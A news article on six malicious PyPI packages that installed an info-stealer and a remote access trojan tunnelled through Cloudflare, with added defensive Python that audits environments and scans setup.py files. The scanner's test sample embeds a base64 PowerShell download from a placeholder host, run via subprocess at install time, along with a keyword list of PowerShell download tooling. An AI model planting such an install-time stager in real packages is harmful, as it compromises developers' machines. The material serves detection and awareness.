Six malicious packages on PyPI, the Python Package Index, were found installing information-stealing and RAT (remote access trojan) malware while using Cloudflare Tunnel to bypass firewall restrictions for remote access.

The malicious packages attempt to steal sensitive user information stored in browsers, run shell commands, and use keyloggers to steal typed secrets.

The six packages were discovered by the Phylum research team, who closely monitors PyPI for emerging campaigns.

The researchers report that these malicious packages first appeared on the package repository on December 22, and the threat actors continued to upload further packages until the last day of the year.

The six malicious packages that Phylum detected are the following:

  • pyrologin – 165 downloads
  • easytimestamp – 141 downloads
  • discorder – 83 downloads
  • discord-dev – 228 downloads
  • style.py – 193 downloads
  • pythonstyles – 130 downloads

All of the packages have now been removed from PyPI, but those who downloaded them will have to manually uninstall the remnants of the infection, most notably the persistence mechanisms.
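Because the packages stay installed on affected machines after their removal from PyPI, a developer's first question is whether any of the six names (or the 'flask_cloudflared' helper the stager pulls in) are present in their environment. The following is an added example, not code from the article or from Phylum: it normalises installed distribution names the way pip does (PEP 503) and compares them against the names listed above. The `cloudflared` lookup on PATH is a best-effort extra check; a tunnel client dropped into a temp directory would not be found that way.

```python
import re
import shutil
from importlib import metadata

# Package names reported in the article, plus the tunnel helper the stager installs.
REPORTED_MALICIOUS = {
    "pyrologin", "easytimestamp", "discorder",
    "discord-dev", "style.py", "pythonstyles",
}
STAGER_DEPENDENCY = "flask_cloudflared"


def normalize(name):
    # PEP 503 normalisation: case-insensitive, runs of '-', '_' and '.' collapse to '-'.
    return re.sub(r"[-_.]+", "-", name).lower()


def find_suspicious(installed_names):
    """Return the sorted subset of installed_names that matches a reported package
    or the flask_cloudflared helper, comparing normalised names."""
    bad = {normalize(n) for n in REPORTED_MALICIOUS} | {normalize(STAGER_DEPENDENCY)}
    return sorted({n for n in installed_names if normalize(n) in bad})


def audit_environment():
    """Check the current interpreter's installed distributions and PATH."""
    names = [dist.metadata["Name"] for dist in metadata.distributions()
             if dist.metadata and dist.metadata["Name"]]
    return {
        "suspicious_packages": find_suspicious(names),
        # The Cloudflare Tunnel client binary is named 'cloudflared'.
        "cloudflared_on_path": shutil.which("cloudflared") is not None,
    }


if __name__ == "__main__":
    # Constructed sample list standing in for a real environment.
    sample = ["requests", "Discord_Dev", "flask-cloudflared", "numpy"]
    print("constructed sample:", find_suspicious(sample))
    print("this environment:", audit_environment())
```

Run it inside each virtual environment you use, since every environment has its own set of installed distributions; a non-empty `suspicious_packages` list means the package should be uninstalled and the machine treated as compromised.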

Information-stealer functionality

The installer (setup.py) in these packages contains a base64-encoded string that decodes to a PowerShell script.

The script uses the '-ErrorAction SilentlyContinue' parameter so that it keeps running quietly even when a command fails, avoiding error output that might alert developers.

The PowerShell script downloads a ZIP file from a remote resource, extracts it into a local temp directory, and then installs a list of dependencies and additional Python packages that make remote control and screenshot capture possible.

Two additional packages, 'flask' and 'flask_cloudflared', are silently installed during that stage.
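The install-time pattern described above (a base64 blob in setup.py that decodes to PowerShell, executed while pip runs the installer) is something a reviewer can check for statically before installing an unfamiliar package. The following is an added example and not code from the article or from Phylum: it parses a setup.py with the `ast` module, tries to base64-decode every long string literal, flags decoded text containing PowerShell markers, and separately flags module-level calls that spawn a process or evaluate code. The embedded setup.py is a constructed, inert sample with a placeholder URL; the marker list is an assumption based on the behaviour the article describes, not a complete signature.

```python
import ast
import base64
import re

# Markers whose presence in a decoded blob suggests a PowerShell download stage.
POWERSHELL_MARKERS = (
    "powershell", "-erroraction", "silentlycontinue", "invoke-webrequest",
    "invoke-expression", "-encodedcommand", "downloadfile", "expand-archive",
)
# Calls that execute something when setup.py itself runs (i.e. at pip install time).
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "os.system", "exec", "eval"}
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _decode_base64(text):
    # Only consider literals that look like a canonical base64 blob of useful length.
    if len(text) < 32 or len(text) % 4 or not _B64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def _call_name(node):
    # Render a call target such as "subprocess.Popen" or "exec"; None if dynamic.
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return None


def scan_setup_py(source):
    """Return a list of (finding, detail) tuples for the given setup.py text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = _decode_base64(node.value)
            if decoded is None:
                continue
            hits = [m for m in POWERSHELL_MARKERS if m in decoded.lower()]
            if hits:
                findings.append(("base64-encoded PowerShell", ", ".join(hits)))
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_CALLS:
                findings.append(("install-time process execution",
                                 f"{name} at line {node.lineno}"))
    return findings


# Constructed sample: an inert PowerShell fragment of the kind the article describes,
# embedded base64-encoded in a minimal setup.py. The URL is a placeholder.
_POWERSHELL_SAMPLE = (
    "Invoke-WebRequest -Uri 'https://example.invalid/payload.zip' "
    "-OutFile payload.zip -ErrorAction SilentlyContinue"
)
SAMPLE_SETUP_PY = f'''
import base64, subprocess
from setuptools import setup
_b = "{base64.b64encode(_POWERSHELL_SAMPLE.encode()).decode()}"
subprocess.Popen(["powershell", "-Command", base64.b64decode(_b).decode()])
setup(name="example-package", version="0.0.1")
'''

if __name__ == "__main__":
    for kind, detail in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"{kind}: {detail}")
```

A clean setup.py that only calls `setup(...)` produces no findings; either finding on its own is a reason to read the package source before installing it, since legitimate packages rarely need to spawn processes or carry encoded scripts at install time.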

One of the files in the ZIP, "server.pyw," launches four threads, one to establish persistence between system reboots, one to ping a proxied onion site, one to start a keystroke logger, and one to steal data from the compromised machine.

The stolen data includes cryptocurrency wallets, browser cookies and passwords, Telegram data, Discord tokens, and more. This data is zipped up and transmitted through transfer[.]sh to the attackers, while a ping to the onion site confirms the completion of the info-stealing step.

Fourth thread performs the data-stealing (Phylum)

Also a remote access trojan

The script then runs "cftunnel.py," also included in the ZIP archive, which installs a Cloudflare Tunnel client on the victim's machine.

Cloudflare Tunnel is a service offering that allows customers, even free accounts, to create a bidirectional tunnel from a server directly to the Cloudflare infrastructure.

This connection allows web servers to quickly become publicly available through Cloudflare without configuring firewalls, opening ports, or dealing with other routing issues.

The threat actors use this tunnel to reach the remote access trojan, which runs on the infected device as the Flask app, even when a firewall protects that device.

The Flask app used by the attackers, also known as "xrat," can steal the victim's username and IP address, run shell commands on the breached machine, exfiltrate specific files and directories, execute Python code, or download and launch additional payloads.

This RAT also supports a "live" remote desktop feed at a one-frame-per-second rate, which activates as soon as the victim types something or moves their mouse.

Live remote feed (Phylum)

This new set of packages uploaded to PyPI shows that the threats on the platform are evolving, becoming more innovative and potent.

Unfortunately, removing the packages and banning the accounts that uploaded them on PyPI does not stop the threat actors, as they can return to action using new names.

Furthermore, even after the packages are removed from PyPI, they remain on infected devices, so developers have to remove them manually.

If you installed any of these malicious packages, it is strongly recommended that you perform an antivirus scan and then change all passwords for the websites you frequently visit.
